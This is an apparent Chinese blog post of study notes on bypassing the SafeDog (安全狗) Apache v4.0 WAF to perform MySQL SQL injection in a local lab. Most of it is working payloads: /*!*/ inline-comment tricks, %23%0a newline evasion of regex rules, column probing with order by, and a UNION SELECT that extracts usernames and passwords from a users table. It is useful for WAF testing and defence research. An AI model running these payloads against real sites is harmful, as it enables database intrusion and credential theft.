最新安全狗 apache v4.0 sql注入 bypass
2024-08-20 22:03:36
前言
最近没事学习一下 waf 的 bypass , 本文介绍下 bypass 安全狗的笔记。个人感觉 bypass 的总思路(正则匹配型 waf)就是利用各种语法特性来逃避正则(当然要保证语法正确性的前提下)
测试环境:
phpstudy + 安全狗Apache版 V4.0、
burp + hackvertor 插件
判断注入
判断字符型注入还是数字型
往数字后面加若干个字母,如果结果不变应该是字符型注入,因为 mysql 的弱类型会把 1xxxx 转换成 1
引入逻辑表达式进行判断
利用 Mysql 支持的 /*!*/ 语法引入 && 绕过过滤
1'/*!&&*/1#'
order by 获取列数
还是利用 /*!*/ 语法来引入关键字, 然后利用 () 包裹数字绕过空格进而绕过正则。
1'/*!&&*/0/*!order*/by(2)#'
所以有 2 列。
绕过 union
%23%0a 绕过正则, 原因大概是 # 是注释符号(只注释一行 \n 截止), waf 认为后面的都是注释不去匹配,而 mysql 支持使用 \n 代替空格,所以绕过了正则。
<@urlencode_1>1'/*!&&*/0/*! union*//*!all*/<@/urlencode_1>%23%0a<@urlencode_2>/*! sElect*/1,@@HOSTNAME#'<@/urlencode_2>
拿密码
使用 %23%0a ,绕过正则
<@urlencode_1>1'/*!&&*/0/*! union*//*!all*/<@/urlencode_1>%23%0a<@urlencode_2>/*! sElect*/user,password <@/urlencode_2>from%23%0a<@urlencode_3>users where user_id=1<@/urlencode_3>%23%27
最新文章
- HTML标签的嵌套规则
- Beta冲刺---Day2
- HTML 事件处理
- PHP中的ob_start用法详解
- Mac Pro 解压安装MySQL二进制分发版 mysql-5.6.30-osx10.11-x86_64.tar.gz(不是dmg的)
- 最初步的正则表达式引擎:生成nfa
- mysql show processlist命令 详解
- 后台启动mysql ,redis
- 第二章 使用JavaScript
- 关于点击空白关闭弹窗的js写法推荐?
- 关于java中private构造函数的问题
- Android线程之异步消息处理机制(一)
- C++多线程学习之(一)——并发与多线程
- UNIX网络编程——Socket/TCP粘包、多包和少包, 断包
- python基础之迭代器与生成器
- tkinter 写一个简易的ide
- TortoiseSVN 1.9.5安装 与 Eclipse4.4.2及以上版本中安装SVN插件
- 自学Java第一周的总结
- 点分治&动态点分治小结
- Eigen 学习之块操作